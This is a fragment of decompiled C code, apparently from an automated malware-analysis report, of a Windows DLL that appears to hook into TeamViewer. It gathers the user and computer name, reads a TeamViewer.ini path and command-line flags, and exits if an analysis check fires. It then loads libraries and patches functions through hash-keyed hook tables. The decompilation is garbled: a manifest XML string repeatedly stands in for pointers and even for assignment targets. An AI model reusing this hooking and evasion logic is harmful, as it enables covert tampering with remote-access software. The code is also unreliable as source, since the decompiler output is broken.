						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						M6F340530 = _t359;
						_t360 = GetModuleFileNameA(0, _t359, 0x104);
						_t546 = M6F340530; // 0x997378
						M6F340538 = _t360;
						M6F34053C = PathFindFileNameA(_t546);
						_t362 = M6F340530; // 0x997378
						_t363 = E6F33A360(_t362, 0, 0);
						M6F340534 = _t363;
						L6F33C2EE();
						 *0x6f340278 = 0x11c;
						L6F33C34E();
						M6F340548 = E6F333280(0);
						_t365 = E6F333220(0);
						_t613 = _t611 + 0x14;
						M6F340544 = _t365;
						__imp__WTSGetActiveConsoleSessionId(0x6f340278, 0x6f340278, 0x11c);
						M6F3404E8 = _t365;
						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x400000
						if( *_t366 != 0x5a4d) {
							goto L131;
						} else {
							_t39 = _t366 + 0x3c; // 0x100
							_t601 =  *_t39 + _t366;
							if( *_t601 != 0x4550) {
								goto L131;
							} else {
								_v860 =  *((intOrPtr*)(_t601 + 0x58));
								_v976 =  *(_t601 + 8);
								_v844 = 0x104;
								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6F3404F8 = _t369;
								if(_t369 != 0) {
									_t483 = GetUserNameW(_t369,  &_v844); // executed
									if(_t483 == 0) {
										_t484 = M6F3404F8; // 0x99b7a8
										 *_t484 = 0;
									}
								}
								_v856 = 0x104;
								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6F340504 = _t371;
								if(_t371 != 0) {
									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
									_t371 = M6F340504; // 0x99ec68
									if(_t371 == 0) {
										 *_t371 = 0;
										_t371 = M6F340504; // 0x99ec68
									}
								}
								_t507 = M6F3404F8; // 0x99b7a8
								if(_t507 != 0) {
									M6F3404F4 = E6F33A2F0(_t507, 0, 0);
									_t371 = M6F340504; // 0x99ec68
									_t613 = _t613 + 0xc;
								}
								if(_t371 != 0) {
									_t481 = E6F33A2F0(_t371, 0, 0);
									_t613 = _t613 + 0xc;
									M6F340500 = _t481;
								}
								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
								M6F3404CC = _t373;
								if(_t373 != 0) {
									_t531 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									wsprintfA(_t373, "%s%s%s", _t531, "TeamViewer", ".ini");
									_t576 = M6F3404CC; // 0x99d818
									_t480 = E6F33A360(_t576, 0, 0);
									_t613 = _t613 + 0x20;
									M6F3404D0 = _t480;
								}
								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) {
									_push( &M6F3404F0);
									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
									M6F3404AC = E6F333390();
									_t375 = E6F331D50(0x77d938, _t601);
									M6F340580 = _t375;
									M6F340518 = _t375;
									M6F34054C = E6F331D50(0x7b16d4, _t601);
									M6F340570 = E6F331D50(0x7b7db0, _t601);
									M6F340550 = E6F331D50(0x7725be, _t601);
									M6F340554 = E6F331D50(0x7725bc, _t601);
									M6F340574 = E6F331D50(0x7b701c, _t601);
									M6F340578 = E6F331D50(0x7a2d08, _t601);
									M6F34057C = E6F331D50(0x7b70d8, _t601);
									M6F340558 = E6F331D50(0x7a304c, _t601);
									M6F34055C = E6F331D50(0x749a58, _t601);
									M6F340560 = E6F331D50(0x74b970, _t601);
									"voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = E6F331D50(0x7b0408, _t601);
									M6F340568 = E6F331D50(0x77ec48, _t601);
									M6F34056C = E6F331D50(0x74cddc, _t601);
									_t390 = E6F33A2F0(E6F331D50(0x7b4550, _t601), 0, 0);
									M6F3404DC = _t390;
									M6F3404E0 = lstrlenA(_t390);
									M6F340584 = E6F331D50(0x77a5b8, _t601);
									M6F3404D8 = E6F33A2F0(E6F331D50(0x7ad0d4, _t601), 0, 0);
									M6F3404D4 = E6F33A2F0(E6F331D50(0x7adf00, _t601), 0, 0);
									M6F340588 = E6F331D50(0x772a50, _t601);
									 *0x6f34047c = E6F33A2F0(E6F331D50(0x772af0, _t601), 0, 0);
									_t400 = GetCommandLineA();
									_t508 =  &_v868;
									_v868 = 0;
									_t605 = E6F33A3D0(_t400,  &_v868);
									_t618 = _t613 + 0xdc;
									if(_t605 != 0) {
										CharLowerA( *_t605);
										_t575 = _v868;
										if(_t575 > 1) {
											_t596 = 1;
											do {
												if(_t596 >= _t575 - 1) {
													L34:
													_t476 =  *((intOrPtr*)(_t605 + _t596 * 4));
													_t508 =  *_t476;
													__eflags = _t508 - 0x6b;
													if(_t508 != 0x6b) {
														L37:
														__eflags = _t508 - 0x66;
														if(_t508 == 0x66) {
															__eflags =  *(_t476 + 1);
															if( *(_t476 + 1) == 0) {
																M6F3404B8 = 1;
															}
														}
													} else {
														__eflags =  *(_t476 + 1);
														if( *(_t476 + 1) != 0) {
															goto L37;
														} else {
															M6F3404B4 = 1;
														}
													}
												} else {
													_t477 =  *((intOrPtr*)(_t605 + _t596 * 4));
													if( *_t477 != 0x77 ||  *((intOrPtr*)(_t477 + 1)) != 0) {
														goto L34;
													} else {
														_t508 =  *(_t605 + 4 + _t596 * 4);
														_t596 = _t596 + 1;
														_t478 = StrToIntA(_t508);
														_t575 = _v868;
														M6F340514 = _t478;
													}
												}
												_t596 = _t596 + 1;
											} while (_t596 < _t575);
										}
										LocalFree(_t605);
									}
									_push(8);
									_push(0x6f340398);
									L6F33C2EE();
									_t548 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									E6F332140(_t508, _t548, 1);
									_t403 = M6F3404F0; // 0x998d58
									_t509 = M6F340500; // 0x977288
									_t549 = M6F3404F4; // 0x99b258
									_t404 = E6F333180(_t549, _t509, _t403);
									_t511 = M6F3404F0; // 0x998d58
									_v972 = 0x6467;
									_v970 = 0;
									M6F3404E4 = _t404 % 0x7fffffff;
									_t552 = M6F3404CC; // 0x99d818
									_t407 = GetPrivateProfileIntA(_t511,  &_v972, 0, _t552);
									_t553 = M6F340524; // 0x9954b0
									M6F3404BC = _t407; // executed
									_t408 = GetModuleHandleA(_t553); // executed
									"embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t408;
									_t410 = GetModuleHandleA(E6F331D50(0x77146c, _t601));
									_push(0x435a88);
									_t606 = _t410;
									_push(1);
									_push( &_v968);
									_push(_t606);
									_v968 = 0x3f82e705;
									_v964 = 0;
									_v960 = 0;
									_v956 = 0;
									E6F331DB0();
									_t413 = _v956;
									_t621 = _t618 + 0x2c;
									if(_t413 != 0) {
										M6F34058C = _t413;
									}
									_t415 = E6F33A2F0(E6F331D50(0x77d760, _t601), 0, 0);
									_t512 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									_t589 = _t415;
									wsprintfA( &_v576, "%s%s", _t512, _t589);
									_t622 = _t621 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t589);
									_t420 = LoadLibraryA( &_v568); // executed
									M6F3404A8 = _t420;
									if(E6F33B4C0() != 0) {
										ExitProcess(0);
									}
									_push(8);
									_push( &_v852);
									M6F340614 = 1;
									L6F33C2EE();
									_v860 = 8;
									_v872 = 0;
									_t423 = NtQuerySystemInformation(0x67,  &_v860, 8,  &_v872); // executed
									if(_t423 < 0 || _v888 != 8 || (_v872 & 0x00000002) == 0) {
										_t591 = 0;
									} else {
										_t591 = 1;
										_v992 = 1;
									}
									if(_t606 != 0) {
										_push(0x435a88);
										_push(1);
										_push( &_v984);
										_push(_t606);
										_v984 = 0x2e136e83;
										_v980 = 0;
										_v976 = 0;
										_v972 = 0;
										E6F331DB0();
										_t470 = _v972;
										_t632 = _t622 + 0x10;
										if(_t470 != 0) {
											"Level>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t470;
										}
										_t96 = _t591 + 0x435a88; // 0x435a88
										_v984 = 0xa1acb3a1;
										_v980 = E6F337C40;
										_v976 =  &M6F3405A4;
										_v972 = 0;
										_v968 = 0xd9ef7edb;
										_v964 = E6F3378B0;
										_v960 =  &M6F340594;
										_v956 = 0;
										_v952 = 0x75da5974;
										_v948 = E6F337C20;
										_v944 =  &M6F3405A0;
										_v940 = 0;
										_v936 = 0x2a081f08;
										_v932 = E6F338230;
										_v928 =  &M6F3405F8;
										_v924 = 0;
										_v920 = 0x71e40fdf;
										_v916 = E6F3382C0;
										_v912 =  &M6F3405FC;
										_v908 = 0;
										E6F331FA0(_t606,  &_v984, 5, _t96);
										_t622 = _t632 + 0x10;
									}
									_t424 = E6F331D50(0x771704, _t601);
									_t514 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									wsprintfA( &_v592, "%s%s", _t514, _t424);
									_t623 = _t622 + 0x18;
									_t427 = LoadLibraryA( &_v584);
									M6F340490 = _t427;
									if(_t427 != 0) {
										_v856 = 0x1ee4afd;
										_v852 = E6F337F10;
										_v848 =  &M6F3405E8;
										_v844 = 0;
										_v840 = 0xcd967670;
										_v836 = E6F3380B0;
										_v832 =  &M6F3405EC;
										_v828 = 0;
										_v824 = 0xc640750c;
										_v820 = E6F338100;
										_v816 =  &M6F3405F0;
										_v812 = 0;
										_v808 = 0x856c5686;
										_v804 = E6F337E20;
										_v800 =  &M6F3405C0;
										_v796 = 0;
										_v792 = 0xd576e7bf;
										_v788 = E6F337E50;
										_v784 =  &M6F3405C4;
										_v780 = 0;
										_v776 = 0x4bdf2df3;
										_v772 = E6F337EC0;
										_v768 =  &M6F3405B8;
										_v764 = 0;
										_v760 = 0x25955ea4;
										_v756 = E6F337EE0;
										_v752 =  &M6F3405E0;
										_v748 = 0;
										_v744 = 0x576e0706;
										_v740 = E6F337E00;
										_v736 =  &M6F3405B0;
										_v732 = 0;
										_v728 = 0xa3bab257;
										_v724 = E6F337E00;
										_v720 =  &M6F3405B4;
										_v716 = 0;
										_v712 = 0xeb950520;
										_v708 = E6F337EF0;
										_v704 =  &M6F3405E4;
										_v700 = 0;
										_v696 = 0x983d21d0;
										_v692 = E6F337E90;
										_v688 =  &M6F3405C8;
										_v684 = 0;
										_v680 = 0xbd4f6953;
										_v676 = E6F337EA0;
										_v672 =  &M6F3405CC;
										_v668 = 0;
										_v664 = 0xc1059600;
										_v660 = E6F337EF0;
										_v656 =  &M6F3405BC;
										_v652 = 0;
										_v648 = 0x92d6cfa1;
										_v644 = E6F337EB0;
										_v640 =  &M6F3405D0;
										_v636 = 0;
										_v632 = 0xa710b547;
										_v628 = E6F337EF0;
										_v624 =  &M6F3405D4;
										_v620 = 0;
										_v616 = 0x35fe64ad;
										_v612 = E6F337DB0;
										_v608 =  &M6F3405A8;
										_v604 = 0;
										_v600 = 0x508fafbc;
										_v596 = E6F337DE0;
										_v592 =  &M6F3405AC;
										_v588 = 0;
										E6F331FA0(_t427,  &_v856, 0x11, _t591 + 0x435a88);
										_t568 = M6F340578; // 0x798f80
										_t189 = _t568 + 9; // 0x6854706f
										_v976 =  *_t189;
										_t463 = M6F340568; // 0x74cec0
										_t191 = _t463 + 0x1e; // 0x65006c
										_t623 = _t623 + 0x10;
										_v974 =  *_t191 & 0x0000ffff;
										_t193 = _t463 + 0x1e; // 0x65006c
										_t464 = M6F340574; // 0x784294
										_v972 =  *_t193 & 0x0000ffff;
										_t195 = _t464 + 1; // 0x61476e79
										_v970 =  *_t195;
										_v966 = 0x62;
										_v968 =  *_t464;
										_t199 = _t464 + 3; // 0x65746147
										_v964 =  *_t199;
										_v962 = 0;
										_t466 = FindWindowW( &_v976, 0); // executed
										_v964 = 0;
										_t468 = FindWindowW( &_v976, 0); // executed
										_t591 = _t466 + _t468;
										_v984 = _t591;
									}
									_t428 = E6F331D50(0x770adc, _t601);
									_t515 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									wsprintfA( &_v584, "%s%s", _t515, _t428);
									_t624 = _t623 + 0x18;
									_t431 = LoadLibraryA( &_v576);
									M6F340494 = _t431;
									if(_t431 != 0) {
										_t208 = _t591 + 0x435a88; // 0x435a88
										_v968 = 0x1febfb51;
										_v964 = E6F337ED0;
										_v960 =  &M6F3405DC;
										_v956 = 0;
										_v952 = 0xa4bc5079;
										_v948 = E6F337EC0;
										_v944 =  &M6F3405D8;
										_v940 = 0;
										_v936 = 0x3fca0603;
										_v932 = E6F3383A0;
										_v928 =  &M6F340608;
										_v924 = 0;
										_v920 = 0x5fa6686b;
										_v916 = E6F3383D0;
										_v912 =  &M6F34060C;
										_v908 = 0;
										E6F331FA0(_t431,  &_v968, 4, _t208);
										_t624 = _t624 + 0x10;
									}
									_t432 = E6F331D50(0x7715e4, _t601);
									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									wsprintfA( &_v576, "%s%s", _t433, _t432);
									_t625 = _t624 + 0x18;
									_t435 = LoadLibraryA( &_v568);
									M6F340498 = _t435;
									if(_t435 != 0) {
										_t228 = _t591 + 0x435a88; // 0x435a88
										_v960 = 0xa0428c41;
										_v956 = E6F337B70;
										_v952 =  &M6F340598;
										_v948 = 0;
										_v944 = 0x35ad950a;
										_v940 = E6F337BD0;
										_v936 =  &M6F34059C;
										_v932 = 0;
										E6F331FA0(_t435,  &_v960, 2, _t228);
										_t625 = _t625 + 0x10;
									}
									_t436 = E6F331D50(0x350b4, _t601);
									_t437 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									wsprintfA( &_v568, "%s%s", _t437, _t436);
									_t626 = _t625 + 0x18;
									_t439 = LoadLibraryA( &_v560);
									M6F34049C = _t439;
									if(_t439 != 0) {
										_v952 = 0x32e7e368;
										_v948 = E6F3382F0;
										_v944 =  &M6F340600;
										_v940 = 0;
										E6F331FA0(_t439,  &_v952, 1, _t591 + 0x435a88);
										_t626 = _t626 + 0x10;
									}
									_t441 = E6F33A2F0(E6F331D50(0x77cf0c, _t601), 0, 0);
									_t560 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									_t592 = _t441;
									wsprintfA( &_v560, "%s%s", _t560, _t592);
									_t627 = _t626 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t592);
									_t446 = LoadLibraryA( &_v552); // executed
									M6F3404A0 = _t446;
